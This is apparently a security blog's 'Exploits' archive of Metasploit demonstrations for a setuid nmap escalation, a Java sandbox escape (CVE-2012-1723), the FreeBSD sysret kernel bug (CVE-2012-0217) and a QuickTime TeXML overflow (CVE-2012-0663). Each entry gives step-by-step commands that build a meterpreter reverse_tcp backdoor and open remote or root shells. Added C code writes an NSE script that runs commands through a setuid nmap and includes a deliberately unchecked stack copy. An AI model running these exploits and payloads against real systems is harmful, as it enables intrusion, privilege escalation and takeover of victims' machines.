Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

Setuid Nmap Exploit Metasploit Demo

Timeline :

Metasploit PoC provided on 2012-06-13

PoC provided by :

egypt

Reference(s) :

None

Affected version(s) :

Any Nmap version installed with the setuid bit set

Tested on CentOS release 6.2 with :

Nmap 6.01

Description :

Nmap’s man page mentions that “Nmap should never be installed with special privileges (e.g. suid root) for security reasons.” and specifically avoids making any of its binaries setuid during installation. Nevertheless, administrators sometimes feel the need to do insecure things. This module abuses a setuid nmap binary by writing out a Lua NSE script containing a call to os.execute(). Note that modern interpreters will refuse to run scripts on the command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby} payloads will most likely not work.
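The two halves of what the module relies on, as an added example (my own code, not part of the original post and not the Metasploit module): first the precondition, an nmap binary owned by root with the setuid bit set, which is what an audit should look for; second the trigger, an NSE script whose prerule calls os.execute(), which nmap runs with its effective UID. Prerule scripts run in the pre-scan phase even when no targets are given, so “nmap --script <file>” is enough to fire it. The NSE text written by the helper and the candidate paths in main() are assumptions for illustration; the module’s own script is not reproduced here.

```c
/* Added example: audit helper for a setuid-root nmap, plus a writer for an NSE
 * script that runs a command from a prerule. Not QuickTime, Metasploit or Nmap
 * project code. */
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

#ifndef S_ISUID
#define S_ISUID 04000
#endif

/* Returns 1 if path is a regular file carrying the setuid bit, 0 otherwise
 * (including when the file does not exist). */
int has_setuid_bit(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return 0;
    return S_ISREG(st.st_mode) && (st.st_mode & S_ISUID) ? 1 : 0;
}

/* The condition the module needs: setuid bit set AND owned by root, so the
 * shell spawned by os.execute() ends up with EUID 0. */
int is_setuid_root(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return 0;
    return S_ISREG(st.st_mode) && (st.st_mode & S_ISUID) && st.st_uid == 0 ? 1 : 0;
}

/* Writes an NSE script to out_path whose prerule runs cmd. The command is placed
 * in a Lua long string, so it may contain quotes but must not contain "]]".
 * Returns 0 on success, -1 on error. The script body is an illustration written
 * for this example. */
int write_nse_exec_script(const char *out_path, const char *cmd)
{
    if (strstr(cmd, "]]") != NULL)
        return -1;
    FILE *f = fopen(out_path, "w");
    if (f == NULL)
        return -1;
    fprintf(f,
        "local os = require \"os\"\n"
        "description = \"added example: runs a command from a prerule\"\n"
        "categories = {\"safe\"}\n"
        "author = \"example\"\n"
        "license = \"example\"\n"
        "prerule = function() return true end\n"   /* pre-scan phase: no targets needed */
        "action = function()\n"
        "  os.execute([[%s]])\n"                     /* runs with nmap's effective UID */
        "end\n", cmd);
    return fclose(f) == 0 ? 0 : -1;
}

int main(void)
{
    /* Assumed install locations; /usr/local/bin/nmap is the path used in the demo. */
    const char *candidates[] = { "/usr/bin/nmap", "/usr/local/bin/nmap" };
    for (size_t i = 0; i < sizeof candidates / sizeof candidates[0]; i++)
        printf("%-22s %s\n", candidates[i],
               is_setuid_root(candidates[i]) ? "setuid root: exploitable"
                                             : "not setuid root");
    return 0;
}
```

Running the audit part on a host where nmap was installed setuid prints the path with “setuid root: exploitable”; anything else means the module’s precondition is not met.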

Commands :

You need an active session on the target first; in this demo it is obtained through a backdoor executable generated with msfpayload.

sudo msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.178.100 X > backdoor

Upload the backdoor on the target

use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid

use exploit/unix/local/setuid_nmap
set Nmap /usr/local/bin/nmap
set SESSION 1
set TARGET 1
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-1723 Oracle Java Applet Field Bytecode Verifier Cache RCE Metasploit Demo

Timeline :

Public release of the vulnerability on 2012-06-12
First PoC provided by Michael Schierl on 2012-06-13
Metasploit PoC provided on 2012-07-09

PoC provided by :

Stefan Cornellius
mihi
littlelightlittlefire
juan vazquez
sinn3r

Reference(s) :

CVE-2012-1723
OSVDB-82877
BID-52161
Oracle Java SE Critical Patch Update Advisory – June 2012

Affected version(s) :

Oracle Java SE 7 Update 4 and before
Oracle Java SE 6 Update 32 and before
Oracle Java SE 5 Update 35 and before
Oracle Java SE 1.4.2_37 and before

Tested on Windows XP Pro SP3 with :

Oracle Java SE 1.6.0_32-b05

Description :

This module exploits a vulnerability in the HotSpot bytecode verifier where an invalid optimisation of the GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checks. This provides a way to escape the JRE sandbox and load additional classes in order to perform malicious operations.

Commands :

use exploit/multi/browser/java_verifier_field_access
set SRVHOST 192.168.178.100
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-0217 Intel’s sysret Kernel Privilege Escalation on FreeBSD Demo

Timeline :

Vulnerability discovered by Rafal Wojtczuk
Coordinated public release of the vulnerability on 2012-06-12
FreeBSD PoC provided by fail0verflow on 2012-07-05

PoC provided by :

Rafal Wojtczuk
John Baldwin
fail0verflow

Reference(s) :

CVE-2012-0217
OSVDB-82949
FreeBSD-SA-12:04.sysret

Affected version(s) :

All supported versions of FreeBSD (amd64) at the time of the advisory

Tested on FreeBSD 9.0-RELEASE

Description :

FreeBSD/amd64 runs on CPUs from different vendors. Due to varying behaviour of CPUs in 64 bit mode a sanity check of the kernel may be insufficient when returning from a system call. Successful exploitation of the problem can lead to local kernel privilege escalation, kernel data corruption and/or crash. To exploit this vulnerability, an attacker must be able to run code with user privileges on the target system.
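The “varying behaviour” the advisory refers to is what SYSRET does with a non-canonical return address: on Intel CPUs the #GP is raised while still in ring 0, after the user stack pointer has already been loaded, so the kernel takes a fault on an attacker-chosen stack; AMD CPUs raise it in ring 3. A user return address can be non-canonical when, for example, a syscall instruction sits at the very top of the canonical user range, so RCX (the address of the next instruction) wraps past it. The following is an added example of my own, not the advisory’s patch and not fail0verflow’s PoC: it models the canonical-address test and the SYSRET-versus-IRET decision in plain C so the condition can be checked on any machine. The 48-bit address width and the two-byte syscall encoding are the assumptions it is built on.

```c
/* Added example: models the check behind CVE-2012-0217 / FreeBSD-SA-12:04.sysret.
 * Not kernel code; a user-space illustration of the condition. */
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

#define SYSCALL_INSN_LEN 2u   /* "0f 05", the SYSCALL opcode, assumed here */

/* x86-64 canonical form for a 48-bit virtual address space:
 * bits 63..47 must all equal bit 47, i.e. the top 17 bits are all 0 or all 1. */
bool is_canonical48(uint64_t va)
{
    uint64_t top = va >> 47;
    return top == 0 || top == 0x1FFFFu;
}

/* SYSCALL saves the address of the following instruction in RCX; SYSRET later
 * jumps there. If the SYSCALL instruction ends exactly at the top of user
 * space, this value is the first non-canonical address. */
uint64_t syscall_return_rip(uint64_t syscall_va)
{
    return syscall_va + SYSCALL_INSN_LEN;
}

enum ret_path { RET_SYSRET = 0, RET_IRET = 1 };

/* The shape of the fix: use the fast SYSRET only when the user RIP is canonical.
 * Otherwise return through IRET, whose #GP is delivered with kernel stack and
 * segment state still intact, instead of Intel's SYSRET, which faults in ring 0
 * with the user RSP already in place. */
enum ret_path choose_return_path(uint64_t user_rip)
{
    return is_canonical48(user_rip) ? RET_SYSRET : RET_IRET;
}

int main(void)
{
    /* A SYSCALL whose two bytes occupy the last two canonical user addresses. */
    uint64_t syscall_va = 0x00007FFFFFFFFFFEull;
    uint64_t rip = syscall_return_rip(syscall_va);
    printf("syscall at 0x%016llx -> return RIP 0x%016llx, canonical: %s, path: %s\n",
           (unsigned long long)syscall_va, (unsigned long long)rip,
           is_canonical48(rip) ? "yes" : "no",
           choose_return_path(rip) == RET_SYSRET ? "SYSRET" : "IRET");
    return 0;
}
```

An unpatched kernel takes the SYSRET path unconditionally; with the return address above that is the state the advisory describes, a fault in ring 0 on a user-controlled stack.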

Commands :

uname -a
id
gcc -o CVE-2012-0217-sysret_FreeBSD CVE-2012-0217-sysret_FreeBSD.c
./CVE-2012-0217-sysret_FreeBSD
id

CVE-2012-0663 Apple QuickTime TeXML BoF Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by Alexander Gavrun
Vulnerability reported to ZDI by Alexander Gavrun
Vulnerability reported by ZDI to the vendor on 2011-10-21
Coordinated public release of the vulnerability on 2012-06-12
Metasploit PoC provided on 2012-06-27

PoC provided by :

Alexander Gavrun
sinn3r
juan vazquez

Reference(s) :

CVE-2012-0663
OSVDB-81934
BID-53571
ZDI-12-107
HT1222

Affected version(s) :

QuickTime 7.7.1 and earlier

Tested on Windows XP Pro SP3 with :

QuickTime 7.7.1

Description :

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow and then gain arbitrary code execution in the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, storing user-supplied data on the stack, which results in the overflow.
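The bug class described above, a fixed-size stack buffer receiving a subfield whose length comes from the file, shown next to the bounded version, as an added example of my own. It is not QuickTime’s code and not the Metasploit module: the “style="..."” attribute syntax is a stand-in chosen for the example rather than the real TeXML Style subfield layout, and the 32-byte buffer is an assumed capacity.

```c
/* Added example: unchecked versus bounded copy of a file-controlled subfield
 * into a stack buffer. Illustrative only; not QuickTime3GPP.gtx code. */
#include <stdio.h>
#include <string.h>

#define STYLE_MAX 32   /* assumed fixed capacity of the on-stack style buffer */

enum { STYLE_OK = 0, STYLE_TOO_LONG = -1, STYLE_NOT_FOUND = -2 };

/* Locates the value of a style="..." attribute in line. On success sets *start
 * to its first byte and *len to its length (bytes between the quotes). */
static int find_style_value(const char *line, const char **start, size_t *len)
{
    const char *p = strstr(line, "style=\"");
    if (p == NULL)
        return STYLE_NOT_FOUND;
    p += strlen("style=\"");
    const char *end = strchr(p, '"');
    if (end == NULL)
        return STYLE_NOT_FOUND;
    *start = p;
    *len = (size_t)(end - p);
    return STYLE_OK;
}

/* VULNERABLE pattern: the subfield length is taken from the input and never
 * compared with the buffer. A value of STYLE_MAX bytes or more writes past buf
 * into whatever follows it on the stack (saved registers, return address).
 * Returns the copied length; never call it with untrusted input. */
int apply_style_unchecked(const char *line)
{
    char buf[STYLE_MAX];
    const char *v;
    size_t n;
    if (find_style_value(line, &v, &n) != STYLE_OK)
        return STYLE_NOT_FOUND;
    memcpy(buf, v, n);        /* n is file-controlled */
    buf[n] = '\0';
    return (int)strlen(buf);
}

/* HARDENED: the length is checked against the destination before any byte is
 * copied, leaving room for the terminator; oversized values are rejected. */
int apply_style_checked(const char *line, char *out, size_t out_sz)
{
    const char *v;
    size_t n;
    int rc = find_style_value(line, &v, &n);
    if (rc != STYLE_OK)
        return rc;
    if (n >= out_sz)
        return STYLE_TOO_LONG;
    memcpy(out, v, n);
    out[n] = '\0';
    return STYLE_OK;
}

int main(void)
{
    char out[STYLE_MAX];
    /* Constructed sample lines: one that fits, one sized like a malicious file. */
    const char *ok = "<sample style=\"bold\"/>";
    char bad[128];
    size_t pre = strlen("<sample style=\"");
    memcpy(bad, "<sample style=\"", pre);
    memset(bad + pre, 'A', 64);
    bad[pre + 64] = '\0';
    strcat(bad, "\"/>");

    printf("short value: rc=%d value=%s\n", apply_style_checked(ok, out, sizeof out), out);
    printf("long value:  rc=%d (STYLE_TOO_LONG is %d)\n",
           apply_style_checked(bad, out, sizeof out), STYLE_TOO_LONG);
    return 0;
}
```

Feeding the 64-byte value to apply_style_unchecked() is exactly the write the module performs on the real component; the checked variant turns the same input into an error return.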

Commands :

use exploit/windows/fileformat/apple_quicktime_texml
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid